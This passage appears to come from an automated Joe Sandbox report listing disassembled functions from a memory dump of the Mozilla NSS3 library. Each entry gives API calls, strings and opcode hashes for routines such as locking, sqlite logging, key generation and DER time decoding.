Part of subcall function 6BB3CA30: EnterCriticalSection.KERNEL32(?,?,?,6BB9F9C9,?,6BB9F4DA,6BB9F9C9,?,?,6BB6369A), ref: 6BB3CA7A
Part of subcall function 6BB3CA30: LeaveCriticalSection.KERNEL32(?), ref: 6BB3CB26

memset.VCRUNTIME140(00000000,00000000,?), ref: 6BBA6A02
EnterCriticalSection.KERNEL32(?), ref: 6BBA6AA6
LeaveCriticalSection.KERNEL32(?), ref: 6BBA6AF9
sqlite3_free.NSS3(00000000), ref: 6BBA6B15
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000BCCC), ref: 6BBA6BA6

Strings

winDelete, xrefs: 6BBA6B71
delayed %dms for lock/sharing conflict at line %d, xrefs: 6BBA6B9F

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_freesqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 1816828315-1405699761
Opcode ID: 8fbca7e0a118fed109c6ae78175d98c5d3281b034b9cb4f414f2737d85b27518
Instruction ID: 8f51f9258214546cb8c0d4f57f9a99221a6e47653bf8b31f8c82d52a75511ed1
Opcode Fuzzy Hash: 8fbca7e0a118fed109c6ae78175d98c5d3281b034b9cb4f414f2737d85b27518
Instruction Fuzzy Hash: 625117B1E041559BFB089FA9DC5AABEB7B5EF46314B44413CE5178B2C0DB389902CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6BB9BB80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6BBA21BC), ref: 6BB9BB8C
PR_SetError.NSS3(FFFFE890,00000000), ref: 6BB9BBEB
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6BB9BBFB
GetLastError.KERNEL32 ref: 6BB9BC03
PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6BB9BC19
free.MOZGLUE(00000000), ref: 6BB9BC22

Strings

ffff, xrefs: 6BB9BB9B

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Error$CountCriticalInitializeLastSectionSpincallocfree
String ID: ffff
API String ID: 2588245028-3827681309
Opcode ID: 70b65167a5299fee78736146fb7c1ff300d33699847c7574dd1db042ea17952f
Instruction ID: 571459d2a59a7bae30eff2362d54ced8927e2ea1e7d1448cfb9830b741c21224
Opcode Fuzzy Hash: 70b65167a5299fee78736146fb7c1ff300d33699847c7574dd1db042ea17952f
Instruction Fuzzy Hash: 6111C675A40711ABEB20AF69BC06B0FBAE4EF46B15F04003DF54ADA680DB74D100CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6BCC2B70 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41stringCOMMON

Download Yara Rule

APIs

strstr.VCRUNTIME140(?,.dll), ref: 6BCC2B81
PR_smprintf.NSS3(%s%s,?,.dll), ref: 6BCC2B98
PR_smprintf.NSS3(%s\%s%s,?,?,.dll), ref: 6BCC2BB4
PR_smprintf.NSS3(6BCEAAF9,?), ref: 6BCC2BC4

Strings

%s\%s%s, xrefs: 6BCC2BAF
.dll, xrefs: 6BCC2B7B, 6BCC2BA8, 6BCC2BCE
%s\%s, xrefs: 6BCC2B93

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: R_smprintf$strstr
String ID: %s\%s$%s\%s%s$.dll
API String ID: 3360132973-3501675219
Opcode ID: c5659e41a51f25ce72b7ec0b7abebd44eccb421def31b32a2a15198c91306109
Instruction ID: 088fef1c63d8420bf6e627baaf08b3b44e9218d37ba4e10944c481229f4b2511
Opcode Fuzzy Hash: c5659e41a51f25ce72b7ec0b7abebd44eccb421def31b32a2a15198c91306109
Instruction Fuzzy Hash: E0F0123A431154FA452125AAAD26D9B3E2DDCE36A4B4410AEBC2A7B105F71DA782C0F7

Uniqueness

Uniqueness Score: -1.00%

Function 6BBFCA30 Relevance: 12.2, APIs: 8, Instructions: 174COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BBFCA95
EnterCriticalSection.KERNEL32(00000000), ref: 6BBFCAA9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,00000000,?,6BBFC8CF,?,?,?), ref: 6BBFCAE7
PR_SetError.NSS3(FFFFE013,00000000), ref: 6BBFCB09
PK11_GetBlockSize.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?,6BBFC8CF,?,?,?), ref: 6BBFCB31

Part of subcall function 6BBF1490: PORT_Alloc_Util.NSS3(0000000C,?,?,?,?,6BBFCB40,?,00000000), ref: 6BBF14A1
Part of subcall function 6BBF1490: PORT_ZAlloc_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,6BBFC8CF,?), ref: 6BBF14C7
Part of subcall function 6BBF1490: memset.VCRUNTIME140(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BBF14E4
Part of subcall function 6BBF1490: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000), ref: 6BBF14F5

PR_Unlock.NSS3(?), ref: 6BBFCB97
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BBFCBB2
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6BBFC8CF), ref: 6BBFCBE2

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: UnlockUtil$Alloc_$BlockCriticalEnterErrorItem_K11_SectionSizeValueZfreememcpymemset
String ID:
API String ID: 2753656479-0
Opcode ID: bf49b1c4a08a8ac48fc7da1980a82012bba9a6e74b88e76a8462fd03531696b0
Instruction ID: 81cd720ebe2b89e683a5e1b1825b349f8f3d12210cdf4aa11754a65b2b742387
Opcode Fuzzy Hash: bf49b1c4a08a8ac48fc7da1980a82012bba9a6e74b88e76a8462fd03531696b0
Instruction Fuzzy Hash: 1C5153B5E001599FDB00DFA8DC81AEEB7B8FF09354F044169E908A7211E735EDA5CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBAAB70 Relevance: 12.1, APIs: 8, Instructions: 104pipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,?,00000000), ref: 6BBAABAF
GetLastError.KERNEL32 ref: 6BBAAC44
PR_SetError.NSS3(FFFFE896,00000000), ref: 6BBAAC50

Part of subcall function 6BC5C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BC5C2BF

PR_SetError.NSS3(FFFFE890,00000000), ref: 6BBAAC62
CloseHandle.KERNEL32(?), ref: 6BBAAC75
CloseHandle.KERNEL32(?), ref: 6BBAAC7A

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Error$CloseHandle$CreateLastPipeValue
String ID:
API String ID: 4247729451-0
Opcode ID: ca301dda3b66811347bef20b0cc88f5c49b569cdf7cea0a9793187dfa342f73d
Instruction ID: 3cd5e2e04abc744dc9fb8651883e16cc56221d8e735d97b185db9792d5da50b3
Opcode Fuzzy Hash: ca301dda3b66811347bef20b0cc88f5c49b569cdf7cea0a9793187dfa342f73d
Instruction Fuzzy Hash: BF31CE759041049FEB04DFA8CC8996EBBF4FF49304B258068D9099B360E736DD41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD4BA0 Relevance: 12.1, APIs: 8, Instructions: 80COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6BBDA6A2,?,?,00000000), ref: 6BBD4BB9
EnterCriticalSection.KERNEL32 ref: 6BBD4BD2
TlsGetValue.KERNEL32 ref: 6BBD4BEF
EnterCriticalSection.KERNEL32 ref: 6BBD4C08
PL_HashTableLookup.NSS3 ref: 6BBD4C21
PR_Unlock.NSS3 ref: 6BBD4C2E
PR_Now.NSS3 ref: 6BBD4C3D
PR_Unlock.NSS3 ref: 6BBD4C62

Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07AD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07CD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07D6
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BB3204A), ref: 6BBA07E4
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,6BB3204A), ref: 6BBA0864
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BBA0880
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,6BB3204A), ref: 6BBA08CB
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08D7
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08FB

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 6eb5531855048a964fdef4c1781e8f5ebc528b31dc7f748aceddb66b3d6a07e0
Instruction ID: 7c22e4de957553f860e8fd5465be115e214d21163a8ac386dc27fd8f16ce46ee
Opcode Fuzzy Hash: 6eb5531855048a964fdef4c1781e8f5ebc528b31dc7f748aceddb66b3d6a07e0
Instruction Fuzzy Hash: 6A314CB59047449FDB10EF38C08592ABBF4FF09354B458A69DC998B300EB38E890CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD4A10 Relevance: 12.1, APIs: 8, Instructions: 80COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6BBD5385,?,?,00000000), ref: 6BBD4A29
EnterCriticalSection.KERNEL32 ref: 6BBD4A42
TlsGetValue.KERNEL32 ref: 6BBD4A5F
EnterCriticalSection.KERNEL32 ref: 6BBD4A78
PL_HashTableLookup.NSS3 ref: 6BBD4A91
PR_Unlock.NSS3 ref: 6BBD4A9E
PR_Now.NSS3 ref: 6BBD4AAD
PR_Unlock.NSS3 ref: 6BBD4AD2

Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07AD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07CD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07D6
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BB3204A), ref: 6BBA07E4
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,6BB3204A), ref: 6BBA0864
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BBA0880
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,6BB3204A), ref: 6BBA08CB
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08D7
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08FB

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: e9fd68f74111e1e141a0631b336800b865ccaf7c293cbb2fa318116751838535
Instruction ID: 0d5ca00caa161ee11e36ea1f3bf86f9fbf4b827885630de3dba41d985cb8fa8a
Opcode Fuzzy Hash: e9fd68f74111e1e141a0631b336800b865ccaf7c293cbb2fa318116751838535
Instruction Fuzzy Hash: 633152B5904A548FDB10EF39C08542AF7F4FF09354B058A69DC998B310EB34E991CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC229E0 Relevance: 10.7, APIs: 7, Instructions: 181COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,00000000,00000000,?,?,6BC221DD,00000000), ref: 6BC22A47
SEC_ASN1EncodeInteger_Util.NSS3(?,6BC221DD,00000002,00000000,00000000,?,?,6BC221DD,00000000), ref: 6BC22A60
SECOID_FindOIDByTag_Util.NSS3(00000000,?,?,?,?,00000000,00000000,?,?,6BC221DD,00000000), ref: 6BC22A8E
PK11_KeyGen.NSS3(00000000,?,00000000,83F089CA,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BC22AE9
PORT_ArenaMark_Util.NSS3(00000000), ref: 6BC22B0D
PK11_FreeSymKey.NSS3(?), ref: 6BC22B7B
PK11_FreeSymKey.NSS3(?), ref: 6BC22BD6

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: K11_Util$Free$ArenaEncodeErrorFindInteger_Mark_Tag_
String ID:
API String ID: 1625981074-0
Opcode ID: cd24b30dffd5449f0823bcc542748dcb907f51ed0227edeeca93ffda578b7f66
Instruction ID: 5c9dd4bc3f9daeab0ab383762a04a93945bea3e8ce95c33484ef3903de455efc
Opcode Fuzzy Hash: cd24b30dffd5449f0823bcc542748dcb907f51ed0227edeeca93ffda578b7f66
Instruction Fuzzy Hash: 8F510775E202059BEB108E69DC92F6A77B5AF44318F100178ED19AF281F739EA16CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BC08B60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 173stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BC08B93
PL_strncasecmp.NSS3(?,OID.,00000004), ref: 6BC08BAA
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6BC08D28
PR_SetError.NSS3(FFFFE005,00000000), ref: 6BC08D44
memcpy.VCRUNTIME140(?,?,00000000), ref: 6BC08D72

Strings

OID., xrefs: 6BC08BA4

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: CopyErrorItem_L_strncasecmpUtilmemcpystrlen
String ID: OID.
API String ID: 4247295491-3585844982
Opcode ID: 07dce2775576279ebeac1be56c1168814447bdd05180c04f3caaf26c7ea5315d
Instruction ID: 13806ca238c7ed6ceb9ee7828ccff802b6df424aef2a60134492039d810916c5
Opcode Fuzzy Hash: 07dce2775576279ebeac1be56c1168814447bdd05180c04f3caaf26c7ea5315d
Instruction Fuzzy Hash: E6510AB1F252254BCB208B18CC80F9AB3B5EB55744F0086E9E919D7341FB399F858F94

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC6980 Relevance: 10.6, APIs: 7, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 6BBC5DB0: NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBC5DEC
Part of subcall function 6BBC5DB0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6BBC5E0F

SECITEM_DupItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBC69BA

Part of subcall function 6BC0FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6BBB9003,?), ref: 6BC0FD91
Part of subcall function 6BC0FD80: PORT_Alloc_Util.NSS3(A4686BC1,?), ref: 6BC0FDA2
Part of subcall function 6BC0FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686BC1,?,?), ref: 6BC0FDC4

VFY_EndWithSignature.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6BBC6A59
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBC6AB7
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBC6ACA
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBC6AE0
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBC6AE9

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Util$Alloc_Item_free$AlgorithmDestroyErrorPolicyPublicSignatureWithZfreememcpy
String ID:
API String ID: 2730469119-0
Opcode ID: b9ff284cb72f356b065b68fa6ac9dfb7894fe05eb0d06e34d83bed74c1ae5fec
Instruction ID: 34dcd17996d955747114c5f5af31452f14f9512d7a01dce80738483904216931
Opcode Fuzzy Hash: b9ff284cb72f356b065b68fa6ac9dfb7894fe05eb0d06e34d83bed74c1ae5fec
Instruction Fuzzy Hash: 8D416CB16006449BEB10CF64AC46FAB77E9FF44354F088438E95E87240EF39E911CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB2920 Relevance: 10.6, APIs: 7, Instructions: 121timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6BBB294E

Part of subcall function 6BC11820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6BBB1D97,?,?), ref: 6BC11836

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6BBB296A
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6BBB2991

Part of subcall function 6BC11820: PR_SetError.NSS3(FFFFE005,00000000,?,6BBB1D97,?,?), ref: 6BC1184D

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6BBB29AF
PR_Now.NSS3 ref: 6BBB2A29
PR_SetError.NSS3(FFFFE005,00000000), ref: 6BBB2A50
PR_SetError.NSS3(FFFFE005,00000000), ref: 6BBB2A79

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$Error$GeneralizedTime_
String ID:
API String ID: 2509447271-0
Opcode ID: 4bfd1a9f26c1a028107026c97ad46b873c0e90ea1cccc5e11520038dd8e06249
Instruction ID: 8b0ec56c2d58d79ad76e02cd427bb694690170590c1e058bef904e410c12c139
Opcode Fuzzy Hash: 4bfd1a9f26c1a028107026c97ad46b873c0e90ea1cccc5e11520038dd8e06249
Instruction Fuzzy Hash: 34418271E183559FC714CF28C880A5FB7E5ABD8754F05892DF89893341EB34E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BC0FBD0 Relevance: 10.6, APIs: 7, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6BC0FC12
free.MOZGLUE(?), ref: 6BC0FC2B
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6BC0FC44
realloc.MOZGLUE(?,?), ref: 6BC0FC54
PR_SetError.NSS3(FFFFE013,00000000), ref: 6BC0FC68
PORT_ArenaGrow_Util.NSS3(?,?,?,?), ref: 6BC0FC76
PORT_Alloc_Util.NSS3(?), ref: 6BC0FC81

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Util$Alloc_ArenaError$Grow_freerealloc
String ID:
API String ID: 1441890768-0
Opcode ID: faf941bf4d016b8e3a5cb30ed112f195e8a4e2515277582b23b90c729b15564f
Instruction ID: 0dbfc275e89c05ceee73dfef6b0b11c2754772757d11b270497492dc1202fcef
Opcode Fuzzy Hash: faf941bf4d016b8e3a5cb30ed112f195e8a4e2515277582b23b90c729b15564f
Instruction Fuzzy Hash: 75210DB5A283156FF6204E699C87B16B25CFF41B48F004139AD5982600FF6ED79082A9

Uniqueness

Uniqueness Score: -1.00%

Function 6BCCCBE0 Relevance: 10.5, APIs: 7, Instructions: 46COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000010), ref: 6BCCCBEA
PR_NewLock.NSS3 ref: 6BCCCBF9

Part of subcall function 6BC798D0: calloc.MOZGLUE(00000001,00000084,6BBA0936,00000001,?,6BBA102C), ref: 6BC798E5

PR_NewCondVar.NSS3(00000000), ref: 6BCCCC05

Part of subcall function 6BB9BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6BBA21BC), ref: 6BB9BB8C

free.MOZGLUE(00000000), ref: 6BCCCC1C
DeleteCriticalSection.KERNEL32(-0000001C), ref: 6BCCCC34
free.MOZGLUE(00000000), ref: 6BCCCC41
